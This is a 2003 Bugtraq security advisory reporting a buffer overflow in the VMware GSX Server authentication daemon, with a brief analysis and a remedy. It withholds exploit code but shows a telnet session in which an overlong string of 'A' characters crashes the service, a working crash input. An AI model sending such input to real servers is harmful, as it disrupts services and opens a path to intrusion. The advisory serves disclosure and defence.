[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    VMWare GSX Server Authentication Server Buffer Overflow
From:       Darryl Swofford <dswofford () kpmg ! com>
Date:       2003-10-31 16:28:55
[Download RAW message or body]



Author: Darryl Swofford
Email: dswofford@kpmg.com

Date: 2003/10/31

System:
VMware GSX Server 2.0.1 build-2129 for Windows (other versions not tested). Tested on \
Windows NT/2000/2003/XP systems.

Description:
After reviewing BugTaq #5294 (VMWare GSX Server Authentication Server Buffer Overflow \
Vulnerability) I was able to modify the sample code to exploit the updated \
vmware-authd service.

I will not release the source code as I feel this is not prudent until the vendor \
acknowledges the issue. Until then you can view the overflow by using telnet with the \
following syntax and simply alter the code as I did. 

> telnet VMserver.somecompany.com 902
> 220 VMware Authentication Daemon Version 1.00
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA599 \
vmware-authd  PANIC: Buffer overflow in VMAuthdSocketRead()
 >
Connection to host lost.


Analyses:
It seems that the vmware-authd service limits the input strings of the program when \
passed correct arguments (USER, PASS, GLOBAL); however the initial readline can be \
overflowed as it does not control the amount of data passed to it.   
Remedy:
Stop and disable the VMware authorization service. 


[prev in list] [next in list] [prev in thread] [next in thread]